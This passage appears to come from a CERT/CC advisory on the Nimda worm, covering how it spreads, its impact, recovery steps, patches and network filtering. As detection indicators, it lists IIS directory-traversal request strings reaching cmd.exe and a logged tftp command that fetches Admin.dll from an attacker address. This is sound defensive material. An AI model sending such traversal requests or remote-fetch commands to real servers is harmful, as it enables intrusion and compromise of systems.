Furthermore, the Nimda worm infects existing binaries on the system by creating Trojan horse copies of legitimate applications.
These Trojan horse versions of the applications will first execute the Nimda code (further infecting the system and potentially
propagating the worm), and then complete their intended function.
Browser PropagationAs part of the infection process, the Nimda worm modifies all web content files it finds (including,
but not limited to, files with .htm, .html, and .asp extensions). As a result, any user browsing web content on the system,
whether via the file system or via a web server, may download a copy of the worm. Some browsers may automatically execute
the downloaded copy, thereby infecting the browsing system.
File System PropagationThe Nimda worm creates numerous MIME-encoded copies of itself (using file names with .eml
and .nws extensions) in all writable directories (including those found on a network share) to which the user has access.
If a user on another system subsequently selects the copy of the worm file on the shared network drive in Windows Explorer
with the preview option enabled, the worm may be able to compromise that system.
Additionally, by creating Trojan horse versions of legitimate applications already installed on the system, users may unknowingly
trigger the worm when attempting to make use of these programs.
System FootPrintThe scanning activity of the Nimda worm produces the following log entries for any web server listing
on port 80/tcp: GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
Note: The first four entries in these sample logs denote attempts to connect to the backdoor left by Code Red II, while
the remaining log entries are examples of exploit attempts for the Directory Traversal vulnerability.
II. ImpactIntruders can execute arbitrary commands within the LocalSystem security context on machines running the
unpatched versions of IIS. In the case where a client is compromised, the worm will be run with the same privileges as the
user who triggered it. Hosts that have been compromised are also at high risk for being party to attacks on other Internet
sites.
The high scanning rate of the Nimda worm may also cause bandwidth denial-of-service conditions on networks with infected
machines.
III. Solutions
Recommendations for System Administrators of IIS machines
To determine if your system has been compromised, look for the following:
- a root.exe file (indicates a compromise by Code Red II or sadmind/IIS worms making the system vulnerable to the Nimda
worm)
- an Admin.dll file in the root directory of c:\, d:\, or e:\ (Note that the file name Admin.dll may be legitimately installed
by IIS in other directories.)
- unexpected .eml or .nws files in numerous directories
- the presence of this string: /c+tftp%20-i%20x.x.x.x%20GET%20Admin.dll%20d:\Admin.dll 200
in the IIS logs, where "x.x.x.x" is the IP address of the attacking system. (Note that only the "200" result code indicates
success of this command.)
The only safe way to recover from the system compromise is to format the system drive(s) and reinstall the system software
from trusted media (such as vendor-supplied CD-ROM). Additionally, after the software is reinstalled, all vendor-supplied
security patches must be applied. The recommended time to do this is while the system is not connected to any network. However,
if sufficient care is taken to disable all server network services, then the patches can be downloaded from the Internet.
Detailed instructions for recovering your system can be found in the CERT/CC tech tip:
- Steps for Recovering from
a UNIX or NT System Compromise
Apply the appropriate patch from your vendor
A cumulative patch which addresses all of the IIS-related vulnerabilities exploited by the Nimda worm is available from
Microsoft at
- http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
Recommendations for Network Administrators
Ingress filteringIngress filtering manages the flow of traffic as it enters a network under your administrative control.
Servers are typically the only machines that need to accept inbound connections from the public Internet. In the network usage
policy of many sites, there are few reasons for external hosts to initiate inbound connections to machines that provide no
public services. Thus, ingress filtering should be performed at the border to prohibit externally initiated inbound connections
to non-authortized services. With Nimda, ingress filtering of port 80/tcp could prevent instances of the worm outside of your
network from scanning or infecting vulnerable IIS servers in the local network that are not explicitly authorized to provide
public web services. Filtering of port 69/udp will also prevent the downloading of the worm to IIS via tftp.
Cisco has published a tech tip specifically addressing filtering guidelines to mitigate the impact of the Nimda worm at
- http://www.cisco.com/warp/public/63/nimda.shtml
Egress filteringEgress filtering manages the flow of traffic as it leaves a network under your administrative control.
There is typically limited need for machines providing public services to initiate outbound connections to the Internet. In
the case of Nimda, employing egress filtering on port 69/udp at your network border will prevent certain aspects of the worms
propogation both to and from your network.
Recommendations for End User Systems
Apply the appropriate patch from your vendor
If you are running a vulnerable version of Internet Explorer (IE), the CERT/CC recommends upgrading to at least version
5.0 since older versions are no longer officially maintained by Microsoft. Users of IE 5.0 and above are encourage to apply
patch for the "Automatic Execution of Embedded MIME Types" vulnerability available from Microsoft at
- http://www.microsoft.com/technet/security/bulletin/MS01-020.asp
Note: IE 5.5 SP1 users should apply the patches discussed in MS01-027
Run and Maintain an Anti-Virus Product
It is important for users to update their anti-virus software. Most anti-virus software vendors have released updated information,
tools, or virus databases to help detect and partially recover from this malicious code. A list of vendor-specific anti-virus
information can be found in Appendix A.
Many anti-virus packages support automatic updates of virus definitions. We recommend using these automatic updates when
available.
Don't open e-mail attachments
The Nimda worm may arrive as an email attachment named "readme.exe". Users should not open this attachment.
Disable JavaScript
End-user systems can become infected with the Nimda worm by browsing web sites hosted by infected servers. This method
of infection requires the use of JavaScript to be successful. Therefore, the CERT/CC recommends that end user systems disable
JavaScript until all appropriate patches have been applied and anti-virus software has been updated.
Appendix A. Vendor Information
Antivirus Vendor Information
Aladdin Knowledge Systems
- http://www.eSafe.com/home/csrt/valerts2.asp?virus_no=10087
Central Command, Inc.
- http://support.centralcommand.com/cgi-bin/command.cfg/php/enduser/std_adp.php?
p_refno=010918-000005
Command Software Systems
- http://www.commandsoftware.com/virus/nimda.html
Computer Associates
- http://www.ca.com/virusinfo/encyclopedia/descriptions/n/nimda.htm
F-Secure Corp
- http://www.fsecure.com/v-descs/nimda.shtml
McAfee
- http://vil.mcafee.com/dispVirus.asp?virus_k=99209&
Panda Software
- http://service.pandasoftware.es/library/card.jsp?Virus=Nimda
Proland Software
- http://www.pspl.com/virus_info/worms/nimda.htm
Sophos
- http://www.sophos.com/virusinfo/analyses/w32nimdaa.html
Symantec
- http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html
Trend Micro
- http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A http://www.antivirus.com/pc-cillin/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A
References
You may wish to visit the CERT/CC's computer virus resources page located at
http://www.cert.org/other_sources/viruses.html
|
Play clip
